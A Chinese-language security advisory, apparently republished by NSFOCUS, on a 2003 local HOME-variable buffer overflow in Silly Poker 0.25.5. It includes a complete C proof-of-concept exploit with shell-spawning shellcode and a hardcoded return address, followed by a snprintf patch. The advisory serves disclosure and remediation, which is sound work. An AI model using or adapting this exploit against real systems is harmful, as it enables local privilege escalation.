安全研究

安全漏洞
Silly Poker本地HOME环境变量缓冲区溢出漏洞

发布日期:2003-09-30
更新日期:2003-10-09

受影响系统:
Silly Poker Silly Poker 0.25.5
描述:
BUGTRAQ  ID: 8736

Silly Poker是一款基于LINUX的游戏程序。

Silly Poker不正确处理HOME环境变量数据,本地攻击者可以利用这个漏洞以'games'组权限在系统上执行任意指令。

攻击者提供超长字符串给HOME环境变量,可导致触发缓冲区溢出,精心构建HOME数据可能以'games'组权限在系统上执行任意指令。

<*来源:demz (demz@c-code.net
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106496140731947&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

demz(demz@c-code.net) 提供了如下测试程序:

/* c-sillyPoker.c
*
* PoC exploit made for advisory based uppon an local stack based overflow.
* Vulnerable versions, maybe also prior versions:
*
* silly Poker v0.25.5
*
* Tested on:  Debian 3.1
*
* Advisory source: c-code.net (security research team)
* http://www.c-code.net/Releases/Advisories/c-code-adv002.txt
*
* ---------------------------------------------
* coded by: demz (c-code.net) (demz@c-code.net)
* ---------------------------------------------
*
*/

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

    "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
        "\x89\xe3"                      // mov          ebx, esp
        "\x50"                          // push         eax
        "\x53"                          // push         ebx
        "\x89\xe1"                      // mov          ecx, esp
        "\x99"                          // cdq
        "\xb0\x0b"                      // mov          al, 11
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1
        "\xcd\x80";                     // int          0x80

int main()
{
    unsigned long ret = 0xbffffb44;

    char buffer[1028];
    int i=0;

    memset(buffer, 0x90, sizeof(buffer));

    for (0; i < strlen(shellcode) - 1;i++)
    buffer[500 + i] = shellcode[i];

    buffer[1028] = (ret & 0x000000ff);
    buffer[1029] = (ret & 0x0000ff00) >> 8;
    buffer[1030] = (ret & 0x00ff0000) >> 16;
    buffer[1031] = (ret & 0xff000000) >> 24;
    buffer[1032] = 0x0;

    printf("\nsilly Poker v0.25.5 local exploit\n");
        printf("---------------------------------------- demz @ c-code.net --\n");

    setenv("HOME", buffer, 1);

    execl("/usr/bin/sillypoker", "sillypoker", NULL);
}

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 第三方补丁下载:

--- conf.cpp-orig2003-09-19 00:03:11.000000000 +0100
+++ conf.cpp2003-09-19 00:04:26.000000000 +0100
@@ -80,7 +80,7 @@
void Config::save() {
char path[1024];
FILE* outFile;
-sprintf(path, "%s/.sillypokerrc", getenv("HOME"));
+snprintf(path, sizeof(path)-1, "%s/.sillypokerrc", getenv("HOME"));
if ((outFile = fopen(path, "w"))) {
fprintf(outFile, "players = %d\n", players);
fprintf(outFile, "account = %d\n", account);
@@ -105,7 +105,7 @@
FILE* inFile;

conf = new Config();
-sprintf(path, "%s/.sillypokerrc", getenv("HOME"));
+snprintf(path, sizeof(path)-1, "%s/.sillypokerrc", getenv("HOME"));
if (!(inFile = fopen(path, "r"))) {
return;
} else {
--- stats.cpp-orig2003-09-19 00:03:18.000000000 +0100
+++ stats.cpp2003-09-19 00:03:55.000000000 +0100
@@ -116,7 +116,7 @@
void savestats(void) {
char path[1024];
FILE* statsfile;
-sprintf(path, "%s/.sillypokerstats", getenv("HOME"));
+snprintf(path, sizeof(path)-1, "%s/.sillypokerstats", getenv("HOME"));
if ((statsfile = fopen(path, "w"))) {
fwrite(gamestats, sizeof(Stats), 1, statsfile);
} else {
@@ -127,7 +127,7 @@
void loadstats(void) {
char path[1024];
FILE* statsfile;
-sprintf(path, "%s/.sillypokerstats", getenv("HOME"));
+snprintf(path, sizeof(path)-1, "%s/.sillypokerstats", getenv("HOME"));
if ((statsfile = fopen(path, "r"))) {
gamestats = (Stats*)malloc(sizeof(Stats));
fread(gamestats, sizeof(Stats), 1, statsfile);

厂商补丁:

Silly Poker
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.colby.edu/personal/k/kmradlof/sillypoker/

浏览次数:2732
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障